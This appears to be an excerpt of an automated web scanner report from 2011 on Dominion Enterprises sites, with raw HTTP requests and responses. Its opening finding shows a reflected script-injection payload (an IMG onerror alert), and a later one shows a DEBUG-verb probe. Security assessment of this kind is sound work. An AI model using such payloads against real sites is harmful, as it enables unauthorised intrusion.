HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:40:25 GMT X-Powered-By: PHP/4.4.2 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:40:25 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=f83cff2dc82 Content-Length: 23235 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Businesses</title> <base href="http://www <meta http-equi ...[SNIP]... <img_src/a_onerror/alert FOR BUSINESSES7DB69<IMG SRC=A ONERROR=ALERT(1) </div> ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.dominione |
Path: | /main/do/Advertiser |
GET /main/do/Advertiser Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:34:02 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=a04a373157 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:34:02 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=fed4b74685f Content-Length: 34603 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Advertising User Agreement</title> <base href="http://www ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/Careers HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:34:23 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=1aeb2eec6f Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:34:23 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Type: text/html Set-Cookie: TSa27990=5a5e7a00cb3 Content-Length: 19076 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>Dominion Enterprises | Careers</title> <base href="http://www <meta http-equiv=" ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dhmiservices |
Path: | /ClickContact/js.ashx |
GET /ClickContact/js.ashx Host: www.dhmiservices.com Proxy-Connection: keep-alive Referer: http://www.agentadvantage User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 18:39:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/plain; charset=utf-8 Content-Length: 623 Set-Cookie: BIGipServerdhmweb_http function load565509113() { var load = window.open('http:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dhmiservices |
Path: | /ImageHandler.ashx |
GET /ImageHandler.ashx?img_id Host: www.dhmiservices.com Proxy-Connection: keep-alive Referer: http://www.agentadvantage User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 18:40:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: image/png Content-Length: 5783 Set-Cookie: BIGipServerdhmweb_http .PNG . ...IHDR...{...).......V.... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dhmiservices |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: www.dhmiservices.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Length: 11246 Content-Type: image/x-icon Last-Modified: Wed, 05 Dec 2007 16:04:38 GMT Accept-Ranges: bytes ETag: "06f49895837c81:45c2" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 18:41:31 GMT Set-Cookie: BIGipServerdhmweb_http ......00......h...6...00. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.dhmiservices |
Path: | /Default.aspx |
DEBUG /Default.aspx HTTP/1.0 Host: www.dhmiservices.com Command: start-debug |
HTTP/1.1 401 Unauthorized Connection: close Date: Fri, 06 May 2011 18:39:56 GMT Server: Microsoft-IIS/6.0 WWW-Authenticate: Negotiate WWW-Authenticate: NTLM X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 39 Set-Cookie: BIGipServerdhmweb_http Debug access denied to '/Default.aspx'. |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dominione |
Path: | /site/scripts/jscalendar |
GET /site/scripts/jscalendar Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:33:44 GMT Last-Modified: Fri, 22 Jun 2007 00:07:10 GMT ETag: "1bc1e5-c055-71c78780" Accept-Ranges: bytes Content-Type: application/x-javascript Connection: close /* Copyright Mihai Bazon, 2002-2005 | www.bazon.net/mishoo * ------------------------- * * The DHTML Calendar, version 1.0 "It is happening again" * * Details ...[SNIP]... <mihai_bazon@yahoo.com> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dominione |
Path: | /site/scripts/jscalendar |
GET /site/scripts/jscalendar Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:33:44 GMT Last-Modified: Fri, 22 Jun 2007 00:07:49 GMT ETag: "1bc203-e10-741a9f40" Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 3600 // ** I18N // Calendar EN language // Author: Mihai Bazon, <mihai_bazon@yahoo.com> // Encoding: any // Distributed under the same terms as the calendar itself. // For translators: please use UTF-8 i ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.dominione |
Path: | /site/scripts/s_code.js |
GET /site/scripts/s_code.js HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:33:48 GMT Last-Modified: Wed, 17 Nov 2010 17:28:27 GMT ETag: "1bca81-87d4-4964c0" Accept-Ranges: bytes Content-Type: application/x-javascript Connection: close /* SiteCatalyst: H.22.1. kevin.rogers@dominio 10.08.2010 */ var s_account="dedominion" var s=s_gi(s_account) s.charSet="ISO-8859-1" s.currencyCode="USD" s.trackDownloadLinks=true s.trackExternalLinks=true s.trackInlineStats=true s.lin ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.dhmiservices |
Path: | /ClickContact/js.ashx |
GET /ClickContact/js.ashx Host: www.dhmiservices.com Proxy-Connection: keep-alive Referer: http://www.agentadvantage User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 18:39:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/plain; charset=utf-8 Content-Length: 623 Set-Cookie: BIGipServerdhmweb_http function load565509113() { var load = window.open('http:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.dominione |
Path: | /site/scripts/qm_slide |
GET /site/scripts/qm_slide Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:33:46 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 Last-Modified: Fri, 22 Jun 2007 00:08:43 GMT ETag: "1bc23c-b5c-775298c0" Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 2908 qmad.slide=new Object();qmad.bvis+="qm ...[SNIP]... |